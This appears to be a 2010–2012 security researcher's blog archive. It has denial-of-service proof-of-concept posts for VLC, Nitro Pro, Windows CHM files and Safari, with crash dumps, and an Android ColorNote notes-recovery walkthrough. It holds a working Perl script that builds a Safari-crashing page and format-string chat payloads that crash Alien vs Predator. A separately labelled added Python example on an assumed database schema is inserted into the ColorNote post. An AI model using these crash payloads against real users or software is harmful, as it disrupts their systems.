2012-10-18

VLC Media Player 2.0.3 - .AVI DoS POC

VLC media player (2.0.3 Twoflower) - .AVI DoS Exploit:

!exploitable result:

Exploitability Classification: UNKNOWN
Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at KERNELBASE!lstrlenW+0x000000000000001a (Hash=0x2e3a5a04.0x79532c61)
The data from the faulting address is later used to determine whether or not a branch is taken. 

2012-10-07

Nitro Pro 8.0.3.1 - .PDF DoS POC

New Nitro Pro 8 (8.0.3.1) PDF Reader - .PDF DoS Exploit:

!exploitable result:

BUG_TITLE:Exploitable - User Mode Write AV starting at npdf!ProvideCoreHFT+0x000000000010886a (Hash=0x265b4f1d.0x020d4f2c)
EXPLANATION:User mode write access violations that are not near NULL are exploitable.

2012-03-10

Android ColorNote, notes recovery

So I decided to upgrade the custom Android ROM on my HTC HD2 (Leo), and totally forgot about some of the important notes I left in the Android app ColorNote.

Fortunately, before I upgraded my ROM, I had made a backup using ClockworkMod Recovery and saved it to my PC.

So I put my forensics hat on and got to work:

The backup consisted of the following files:
.android_secure.img
boot.img
cache.img
data.img
nandroid.md5
recovery.img
sd-ext.img
system.img
The IMG files use YAFFS (Yet Another Flash File System).
A quick Google search turned up this post on the XDA Developers forums (download the attachment to the forum thread).
It is a Cygwin-ported build of 'unyaffs'.

Next I had to work out which IMG file to use... So I cheated and asked Android guru Noobhands, who pointed me at data.img (Thx dude!).

The 'unyaffs' is simple to use:
unyaffs.exe data.img
This extracts the contents of the IMG to the current folder.

Android apps store their data under the "data" folder, one sub-folder per app named after the app's package ID. Having a large number of apps on my phone, I now had to work out which folder was actually ColorNote.
The easy way to do this is to look at the app's ID in its Google Market URL:
https://play.google.com/store/apps/details?id=com.socialnmobile.dictapps.notepad.color.note
Sure enough, the folder is there. Within this folder is the folder "databases".
This folder contains the following:
colornote.db
internal.db
internal.db-shm
internal.db-wal
Quickly examining the .DB files in a hex editor, I confirmed they were SQLite 3 databases (the files start with the "SQLite format 3" header).
So I opened the colornote.db with SQLite Browser, switched to the 'Browse Data' tab, and changed the table to "notes" and sure enough all my missing notes were there! woot! :)

What's also interesting is that all of my old deleted notes are still stored too, along with their 'create', 'modified', and 'minor modified' dates.
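The recovery steps above, scripted, as an added example that is not part of the original post. It runs against a constructed stand-in for colornote.db; the 'notes' table schema, the 'deleted' flag and the epoch-millisecond timestamps are assumptions, since the real ColorNote layout is not described here.

```python
# Added example (not from the original post): scripted version of the recovery
# steps above, run on a CONSTRUCTED stand-in for colornote.db. The 'notes'
# schema, the 'deleted' flag and the epoch-millisecond timestamps are assumptions.
import os
import sqlite3
import tempfile
from datetime import datetime, timezone

SQLITE_MAGIC = b"SQLite format 3\x00"  # 16-byte header seen in the hex editor
DATE_COLS = ("created_date", "modified_date", "minor_modified_date")

def is_sqlite3(path):
    """Same check as the hex-editor step: file starts with the SQLite 3 magic."""
    with open(path, "rb") as f:
        return f.read(len(SQLITE_MAGIC)) == SQLITE_MAGIC

def make_sample_db(path):
    """Writes the constructed colornote.db look-alike; note 2 is flagged deleted."""
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE notes (_id INTEGER PRIMARY KEY, title TEXT, note TEXT,"
                " created_date INTEGER, modified_date INTEGER,"
                " minor_modified_date INTEGER, deleted INTEGER DEFAULT 0)")
    con.executemany("INSERT INTO notes VALUES (?,?,?,?,?,?,?)", [
        (1, "Wifi", "router key is in the safe", 1330000000000, 1330001000000, 1330001000000, 0),
        (2, "Shopping", "milk, bread", 1330100000000, 1330100500000, 1330100500000, 1)])
    con.commit()
    con.close()

def dump_notes(path, include_deleted=True):
    """Notes rows as dicts with readable UTC dates; deleted rows kept by default."""
    con = sqlite3.connect(path)
    con.row_factory = sqlite3.Row
    sql = "SELECT * FROM notes" + ("" if include_deleted else " WHERE deleted = 0")
    rows = []
    for r in con.execute(sql):
        d = dict(r)
        for col in DATE_COLS:  # assumed: Java-style milliseconds since the epoch
            d[col] = datetime.fromtimestamp(d[col] / 1000, tz=timezone.utc).isoformat()
        rows.append(d)
    con.close()
    return rows

def demo():
    """Builds the sample database in a temp dir and walks the recovery steps."""
    path = os.path.join(tempfile.mkdtemp(), "colornote.db")
    make_sample_db(path)
    return {"sqlite": is_sqlite3(path), "all": dump_notes(path),
            "live": dump_notes(path, include_deleted=False)}
```

Pointed at a real extracted data.img, only the path and the column names would need adjusting; the header check and the "dump everything, deleted rows included" approach carry over.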

2011-08-22

WinXP Compiled Help File (CHM) DoS (hh.exe)

Here's a PoC Windows XP 'Compiled Help File' (CHM) DoS which has been sitting on my hard disk for a while; tested working on a fully patched WinXP SP3 32-bit machine:

Crashing Executable: hh.exe
Version: 5.2.3790.2453

WinDbg result:
(ed8.edc): Stack overflow - code c00000fd (!!! second chance !!!)
eax=00042968 ebx=000af0b0 ecx=00042964 edx=0007ebb0 esi=000af0b0 edi=0007ebe0
eip=65e3d633 esp=0007e95c ebp=0007ebb4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
itss!_chkstk+0x33:
65e3d633 8501 test dword ptr [ecx],eax ds:0023:00042964=00000000
!exploitable result:
Exploitability Classification: UNKNOWN
Recommended Bug Title: Stack Overflow starting at itss!_chkstk+0x0000000000000033 (Hash=0x7c592e02.0x7a176714)

2010-02-27

New 'Alien vs Predator' Format String Bugs

Alien vs Predator (Feb 17 patch) is vulnerable to Format String attacks.

Posting the following in chat (either in game or in the lobby) will crash your game. I am not sure if it will crash other users too, as I haven't got anybody to test on.

%s%s%s%s%s%s%s%s%s%s
or
%n%n%n%n%n%n%n%n%n%n

Setting your Name to '%n' will stop you from ever joining a game; you just get an error reporting that you're unable to connect.
Setting your Name to '%i' will set your Name to random numbers which change as you play.

I tried contacting Steam/Rebellion/Sega, but so far had no response.

2010-01-20

New 0Day Safari 'background' DoS

New 0Day Safari DoS I found last night.
Can somebody test to confirm it's working for them?
Usage: perl Safari_4.0.4_background_DoS.pl output.htm 114516
Then browse to output.htm in Safari.


#!/usr/bin/perl
#
# Safari 4.0.4 (531.21.10) - Stack Overflow/run
# 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.0]
# Tested on WinXP (32bit) SP3
#
# Magic Numbers:
# 114516 -> 114718 : Safari quits without error
# 114719 : Safari quits with illegal operation:
# AppName: safari.exe
# AppVer: 5.31.21.10
# ModName: cfnetwork.dll
# ModVer: 1.450.5.0
# Offset: 000567a7
use strict;
use warnings;

# Output file name and length of the 'background' attribute value
my $filename = $ARGV[0];
my $buffer   = $ARGV[1];
if (!defined($filename) || !defined($buffer) || $buffer !~ /^\d+$/)
{
    print "Usage: $0 <filename.html> <buffer>\n\n";
    exit 1;
}

# Page skeleton with an oversized 'background' attribute on the body tag
my $header = "<html>\n<head>\n";
my $crash  = "<body background = \"" . ("A" x $buffer) . "\">\n";
my $footer = "</html>\n";

my $data = $header . $crash . $footer;

open(my $fh, '>', $filename) or die "Cannot write $filename: $!\n";
print $fh $data;
close($fh);

exit;